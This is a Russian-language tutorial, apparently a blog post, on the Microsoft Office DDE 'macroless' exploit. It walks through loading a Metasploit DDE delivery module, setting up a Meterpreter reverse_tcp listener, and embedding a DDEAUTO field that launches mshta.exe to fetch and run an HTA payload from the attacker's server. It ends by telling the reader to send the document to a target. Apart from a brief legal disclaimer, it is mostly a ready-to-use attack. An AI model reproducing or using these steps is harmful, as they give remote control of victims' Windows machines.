👨⚕️️ Тестирование на проникновение Windows с использованием Microsoft Office DDE Exploit (MACROLESS) |

👨⚕️️ Тестирование на проникновение Windows с использованием Microsoft Office DDE Exploit (MACROLESS)

Мануал

Эксплуатация DDE также была известна как динамический обмен данными, она позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем.

Хакеры использовали этот метод для выполнения вредоносных скриптов для компрометации данных.

Об этом сообщили в Microsoft от Sensepost, Etienne Stalmans и Saif El-Sherei, но это не было исправлено, так как многие приложения используют протокол DDE.

Этот эксплойт не требует включения макро-функции.

Предпосылки – DDE эксплойт

  • Windows машина
  • Microsoft Office (любая версия)
  • Kali Linux

Нам придется импортировать эксплойт Metasploit.

Загрузите его с GitHub с помощью команды терминала:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Переместите скрипт в местоположение Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Теперь введите msfconsole в терминале, который запускает инфраструктуру Metasploit, и введите reload_all для загрузки модулей.
Этот эксплойт использует функцию dde для доставки полезной нагрузки hta. Теперь введите:
use exploit/windows/dde_deliverythen set the sever host using the following command

set SRVHOST 192.168.177.141
нам нужно установить прослушатель полезной нагрузки.
Не используйте порт 8080, поскольку порт сервера по умолчанию установлен на 8080
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit
Теперь скопируйте и вставьте код в любой текстовый документ.
Мы использовали Office 365 Pro Plus, полностью обновленный.
Найдите формулу, и у вас должно появиться небольшое окно с ошибкой в документе, а затем щелкните правой кнопкой мыши код переключения.
Вставьте команду в документ в скобках.
Сохраните документ.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
Отправьте документ подозреваемому, и откроется сеанс счетчика. Посмотрите на видео

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий